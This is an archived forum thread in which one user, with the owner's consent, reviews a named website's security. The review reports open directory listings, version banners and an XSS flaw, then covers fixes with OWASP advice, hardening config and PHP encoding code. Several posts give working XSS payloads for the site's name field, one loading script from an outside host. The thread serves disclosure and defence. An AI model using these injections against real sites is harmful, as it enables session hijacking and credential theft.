Security Alert - Webmasters - Nairaland
Security Alert by Nobody: 4:41pm On Sep 21, 2010
Please, Nairaland site owners and webmasters, tighten up security. A lot of hackers these days are not smiling, mostly these script kiddies!

Ensure your contact area and most forms, mail your email the values rather than save in a database, and if you decide making use of a database for most applications, tighten up security!

I received 1700 attempted tries to hack my site with various scripts and calls to major hack sites, using their precoded script! All hit my Inbox rather than my Database! Currently battling deleting those junks and improving my security, based on studying the pattern implored.

Also try reading some security advice proffered in this thread https://www.nairaland.com/nigeria/topic-513276.0.html
Re: Security Alert by Nobody: 6:28pm On Sep 21, 2010
Well, apart from that, I've been getting weird messages from females saying that they saw my profile on Nairaland and wanted to know me. At first I believed it, but after like 10 emails like that, I know yahoo yahoo boys are at work, cuz I have never gotten that amount of babes on my case. It's not realistic; logical reasoning.
Re: Security Alert by Nobody: 7:26pm On Sep 21, 2010
@PC, You too like woman jor, How you go believe that kind rubbish, i receive one like that yesterday, i delete am sharp sharp,

Serious i think i know the person that tried hacking me, i will send him a serious mail now. If him try that kind thing again, i go show am say i be Benin Man. Before then, i go go warn him Papa! Since na Script Kiddie!

**sMileZ**
Re: Security Alert by Slyr0x: 10:38pm On Sep 21, 2010
lool, U might be right about everything, but did u say 'Script Kiddie'?

To start with, your site --> http://www.marknollis.com/ is as vulnerable as hell. I can help with a Full Disclosure (that's if you want one) or perhaps post the disclosure after you've got everything patched!

BTW, the thread https://www.nairaland.com/nigeria/topic-513276.0.html doesn't seem to say anything about the method of attack. wink wink
Re: Security Alert by Nobody: 10:52pm On Sep 21, 2010
Bros, Feel free, It's for learning and improvement na! kiss

Oya review the security!
Re: Security Alert by Slyr0x: 11:47pm On Sep 21, 2010
1.) To start with, Directory listing is allowed on the web server

/scripts
/images
/css
/js
/chrometheme
/chromejs/
/freebies
/icons

2.) GET /checklogin.php

discloses the Apache Version/PHP Version/OpenSSL Version/Frontpage Version in its header

Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT

Now it's getting serious: a lookup in a vulnerability DB of the version of Apache being used will reveal how to exploit it.

3.) You've got autocomplete enabled. Adding autocomplete="off" to the form tag will solve this. Though this is a minor vuln, data entered in the 'input' field will be cached by the browser, and anyone who has access to it can steal it.

4.) Now this is the greatest of 'em; it's called Cross Site Scripting

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Now if you don't know the impact of XSS, U can read 'em here

http://sandsprite.com/Sleuth/papers/RealWorld_XSS_1.html
http://www.virtualforge.de/whitepapers/cross_site_scripting_impact.pdf

-Theft of Accounts / Services
-User Tracking / Statistics
-Browser/ User exploitation
-Hi-jacking users' active session
-Changing the look of the page within the victims browser.
-Mounting a successful phishing attack.
-Intercept data and perform man-in-the-middle attacks.
- and Countless others

Mode of Attack - XSS

URL: http://marknollis.com/student.php

POST /apply_details.php

In the Fill your name field, copy & paste this

<SCRIPT>alert(String.fromCharCode(83,108,121,114,48,120))</SCRIPT>

and click on 'Apply Now'. You'll have the image below.

Now u can do anything imaginable; I can call my site/call a JavaScript.

Let's use http://ha.ckers.org/xss.js as an example; the JavaScript being called here is xss.js

Putting this '<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>' in the field gives us image2

I can even load my blog on the page

<iframe src=http://codename-intrusion..com <

Re: Security Alert by Slyr0x: 11:51pm On Sep 21, 2010
NL's spam bot just ate my review.
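
For findings 1 and 2 of the review above (directory listing and version details in the response headers), the weak settings beside the corrected ones. This is an added configuration example, not taken from the site or from any poster; the directory path is a placeholder.

```apache
# --- Apache: httpd.conf / virtual host ---
# Finding 1: directory listing.
# Weak:      Options Indexes      (auto-generates a listing when no index file exists)
# Corrected: remove Indexes for the document root and everything below it.
# "/path/to/docroot" is a placeholder.
<Directory "/path/to/docroot">
    Options -Indexes
</Directory>
# On shared hosting the same line, "Options -Indexes", can go in the site's
# .htaccess if the host's AllowOverride setting permits Options.

# Finding 2: version disclosure in the Server header.
# Weak:      ServerTokens Full    (the default: lists Apache and module versions)
# Corrected: send only "Server: Apache", and no version footer on error pages.
# ServerTokens is valid only in the main server configuration, so on shared
# hosting this change has to come from the host.
ServerTokens Prod
ServerSignature Off

# --- php.ini (separate file) ---
# Weak:      expose_php = On      (adds "X-Powered-By: PHP/<version>")
# Corrected: can only be set in php.ini, not at runtime.
expose_php = Off
```

Hiding version strings only removes the banner; the software behind it still needs to be kept patched.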
Re: Security Alert by 5lyr0x: 12:16am On Sep 22, 2010
The NL SpamBot just ate up the review again + my posting privileges sad

The concluding part: http://pastebin.com/YC2PgJs6
Re: Security Alert by Nobody: 1:13am On Sep 22, 2010
Thanks, shocked
Re: Security Alert by Nobody: 1:15am On Sep 22, 2010
Forgot to strip off tags, Generally the validation was poor! grin

Thanks Once again!
Re: Security Alert by Nobody: 1:21am On Sep 22, 2010
Now, how can i solve problem one and two,

Guess from host

As for the Permission of script, No mind me, when i wrote the code, forgot to script tags, Have done that now, Please try and feed me back!

Thanks Oga, don't even know how to spell your name Slyr0x
Re: Security Alert by 5lyr0x: 2:05am On Sep 22, 2010
Donpuzo:

Now, how can i solve problem one and two,
Guess from host
Yeah.

Donpuzo:

As for the Permission of script, No mind me, when i wrote the code, forgot to script tags, Have done that now, Please try and feed me back!

Nothing has changed. I was able to inject the page.

Donpuzo:

don't even know how to spell your name Slyr0x

Yeah, Slyr0x. Am having issues with that username. Can U pls help me put pressure on 'em MODs.

Got this somewhere

[Quote] The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

[/Quote]

Use this article --> http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
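
One way to apply the quoted advice (whitelist validation on input, encoding on output) to the name field discussed in this thread. This is an added example, not code from the site or from any poster; the function names, the `name` key and the 80-character limit are assumptions, and it targets PHP 7 or later.

```php
<?php
// Added example: hypothetical handler for the "Fill your name" field.
// h(), valid_name() and render_application() are illustrative names.

/** Encode a value for HTML text and for quoted attribute values. */
function h(string $value): string
{
    // ENT_QUOTES encodes both " and ', so the value cannot close an attribute.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Whitelist: starts with a letter, then letters, space, dot, apostrophe, hyphen. */
function valid_name(string $name): bool
{
    return preg_match('/^[\p{L}][\p{L} .\'\-]{0,79}$/u', $name) === 1;
}

/** Build the response for a submitted application form. */
function render_application(array $post): string
{
    $name = isset($post['name']) ? trim((string) $post['name']) : '';

    if (!valid_name($name)) {
        // Rejected input is still encoded before it is echoed back.
        return '<p class="error">Invalid name: ' . h($name) . '</p>';
    }

    // Accepted input is encoded too: validation and output encoding are
    // separate layers, and the encoding is what keeps the browser from
    // treating the value as markup.
    return '<p>Thank you, ' . h($name) . '</p>'
         . '<input type="text" name="name" value="' . h($name) . '">';
}

// Constructed input: the alert() test string posted earlier in this thread.
$probe = '<SCRIPT>alert(String.fromCharCode(83,108,121,114,48,120))</SCRIPT>';
echo render_application(['name' => $probe]), "\n";

// Constructed input: a legitimate name containing an apostrophe.
echo render_application(['name' => "Ada O'Neil"]), "\n";
```

Stripping tags alone does not cover attribute contexts, because `strip_tags()` leaves quote characters untouched; encoding at the point of output does.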